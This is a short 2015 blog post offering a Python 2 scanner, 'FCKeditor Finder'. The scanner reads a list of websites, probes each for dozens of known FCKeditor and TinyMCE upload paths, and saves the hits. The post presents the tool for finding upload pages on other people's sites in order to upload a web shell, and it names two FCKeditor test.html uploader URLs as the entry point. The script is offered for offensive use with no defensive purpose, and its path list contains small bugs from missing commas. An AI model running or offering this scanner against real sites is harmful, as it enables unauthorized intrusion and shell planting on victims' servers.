Tuesday, August 4, 2015

FCKeditor finder for upload shell

Most of FCKeditor vulnerable to shell upload from example path in the blow:

1
2
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

via this script, you can find common uploader that is using in [FCKeditors]
I tried to collect all of the paths that are important and most use! and I write this script to find them, even restricted access to them.

Download script


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import urllib2
import socket
import cookielib
import sys
import re
import os

socket.setdefaulttimeout(10)

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
    os.system(clearing)
if len(sys.argv) <= 1:
    print "\n|----------------------------------------------|"
    print "|            - FCKeditor Finder  -               |"
    print "|      Usage: FCKditorFinder.py sites_list.txt   |"
    print "|               https://nezami.me                |"
    print "|----------------------------------------------|\n"
    sys.exit(1)

dirs=['fckeditor','FCKeditor','include/fckeditor','includes/fckeditor','admin/fckeditor','fck/fckeditor','fck3ditor/fckeditor','editor/fckeditor','filemanager/fckeditor','plugins/fckeditor','FCKeditor/fckeditor''TVS/FCKeditor','forum/fckeditor','forums/fckeditor','home/fckeditor','shcsAdmin/fckeditor','wspro/html/js/editor/fckeditor/','html/js/editor/fckeditor/','scripts/ajax/FCKeditor/','CFIDE/scripts/ajax/FCKeditor/','CMSAdminControls/FCKeditor/','mambots/editors/fckeditor/','webspace/html/js/editor/fckeditor/','resources/fckeditor/','jphoto/fckeditor/','sysadmin/utils/FCKeditor/','templates/fckeditor/','fcnews/fckeditor/','js/fckeditor/','/sites/all/modules/fckeditor/','admin/classes/components/formattedTextArea/fckeditor/','admin/panel/fckeditor/','cfscripts/ajax/FCKeditor/','ECP/fsboard/fckeditor/','sadmin/FCKeditor/','index/class/xoopseditor/fckeditor/','arti/outils/fckeditor/','Common/Scripts/fckeditor','jmcmurra/generators/inc/fckeditor','admin/view/javascript/fckeditor','editors/FCKeditor/','ModernDeckDepot/fckeditor','otkup_test/fckeditor/','shop/assets/js/fckeditor/','webshop//portal/templates/fckeditor/','new/aset/js/fckeditor/','siebenkorn/script/FCKeditor','assetmanager/HTMLEditor/''portal/handlers/tiny_mce/','fa/handlers/tiny_mce/','handlers/tiny_mce/','plugins/tiny_mce/','zp-core/plugins/tiny_mce/','wp-content/plugins/asset-manager/','plugins/asset-manager/']


try:
    f=open(sys.argv[1],'r')
    for line in f.readlines():
        line = line.rstrip()
        for subdir in dirs:
            site="%s/%s" %(line,subdir)
            print site
            hdr = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'en-US,en;q=0.5','Accept-Encoding': 'gzip, deflate','Connection': 'keep-alive'}
        
            req = urllib2.Request(site, headers=hdr)

            guery=['403 - Forbidden: Access is denied.','Directory Listing Denied',
                'Parent Directory','Forbidden','Index of /','Directory Listing For']

            try:
                page=urllib2.urlopen(req) 
                content= page.fp.read()
                for eMSG in guery:
                    if re.search(eMSG,content): 
                        print "OK >>>"+site
                        f=open("fckeditor.txt","a")
                        f.write(site+"\n")         
            except urllib2.HTTPError, e:
                page=e.fp.read()
                for eMSG in guery:
                    if re.search(eMSG, page):
                        print "OK >>>"+site
                        f=open("fckeditor.txt","a")
                        f.write(site+"\n")
            except urllib2.URLError:
                print "Time Out\nTry To Another..."
            except ValueError:
                print "Please Input valid URL"
            except socket.timeout:
                print "Time Out"
except IOError:
    print "Please Input Correct File Name"
    sys.exit(1)
except KeyboardInterrupt:
    print "You pressed Ctrl+C"
    pass

No comments:

Post a Comment